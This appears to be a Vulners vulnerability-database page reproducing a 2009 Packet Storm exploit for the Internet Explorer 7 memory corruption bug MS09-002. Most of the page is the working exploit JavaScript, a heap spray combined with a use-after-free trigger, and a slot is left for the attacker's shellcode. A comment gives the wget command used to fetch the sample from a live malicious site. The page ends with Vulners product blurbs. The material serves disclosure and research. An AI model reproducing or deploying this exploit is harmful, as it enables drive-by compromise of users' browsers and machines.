Lucene search
K

Microsoft Internet Explorer 7 Memory Corruption

🗓️ 20 Feb 2009 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Microsoft Internet Explorer 7 Memory Corruption exploit from MS09-00

Code
`<!--  
MS09-002  
===============================  
grabbed from:  
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"  
  
took a little but found it. /str0ke  
-->  
  
<script language="JavaScript">  
  
var c="putyourshizhere-unescaped";  
  
var array = new Array();   
  
var ls = 0x100000-(c.length*2+0x01020);   
  
var b = unescape("%u0C0C%u0C0C");   
while(b.length<ls/2) { b+=b;}   
var lh = b.substring(0,ls/2);   
delete b;   
  
for(i=0; i<0xC0; i++) {   
array[i] = lh + c;  
}   
  
CollectGarbage();  
  
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");  
var a1 = new Array();  
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));  
  
function ok() {   
o1=document.createElement("tbody");   
o1.click;   
var o2 = o1.cloneNode();   
o1.clearAttributes();   
o1=null; CollectGarbage();   
for(var x=0;x<a1.length;x++) a1[x].src=s1;   
o2.click;  
}  
</script><script>window.setTimeout("ok();",800);</script>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Feb 2009 00:00Current
0.6Low risk
Vulners AI Score0.6
16